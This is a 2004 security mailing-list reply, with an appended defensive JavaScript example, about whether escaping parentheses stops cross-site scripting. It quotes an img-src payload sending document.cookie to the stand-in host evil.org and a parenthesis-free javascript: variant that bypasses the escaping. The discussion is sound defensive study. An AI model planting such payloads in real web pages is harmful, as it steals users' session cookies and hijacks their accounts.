WebApp Sec mailing list archives
RE: AppSec FAQ at OWASP
From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Thu, 29 Jan 2004 15:18:25 +0100
Quoting Sangita Pakala <sangita.pakala () paladion net>:

>> Why is it important to escape "(", ")" and "#"?
>
> <img src= "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)">
>
> Escaping the "(" and ")" above renders the function call mute.

Oh, I see. On the other hand, <img src="javascript:self.location.href='http://whatever'"> doesn't have any "(" or ")" characters, so it's not a complete solution, but a partial one.

-- 
Ulf Härnhammar
student, Uppsala universitet
editor, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
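Added example, not part of the original post or of the OWASP FAQ: the two src values quoted in this message are run through a character-escaping filter and through a URL-scheme allow-list, to show that the second value passes the filter unchanged while the allow-list rejects both. The function names, the entity-encoding form of "escaping", the base URL and the two benign sample values are assumptions made for illustration.

```javascript
// Constructed sample set: the first two values are the src attributes quoted
// in the thread; the last two are benign values constructed for comparison.
const SAMPLES = [
  "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)",
  "javascript:self.location.href='http://whatever'",
  "http://example.invalid/logo.png",
  "images/logo.png",
];

// Partial approach from the thread: escape "(", ")" and "#".
// Encoding them as numeric character references is an assumption here;
// the thread does not say which escaping form the FAQ means.
function escapeParens(value) {
  return value.replace(/[()#]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Scheme allow-list: resolve the value against a base URL (placeholder)
// with the WHATWG URL parser and accept only http(s) results.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

function isSafeImageSrc(value, base = "https://site.invalid/") {
  let url;
  try {
    url = new URL(value, base);
  } catch {
    return false; // unparseable input is rejected, not passed through
  }
  // url.protocol is lower-cased by the parser, so "Javascript:" is caught.
  return ALLOWED_SCHEMES.has(url.protocol);
}

// One row per sample: did the escaping change it, and does the scheme
// check accept it?
function report() {
  return SAMPLES.map((s) => ({
    input: s,
    unchangedByEscape: escapeParens(s) === s,
    allowedByScheme: isSafeImageSrc(s),
  }));
}

console.table(report());
```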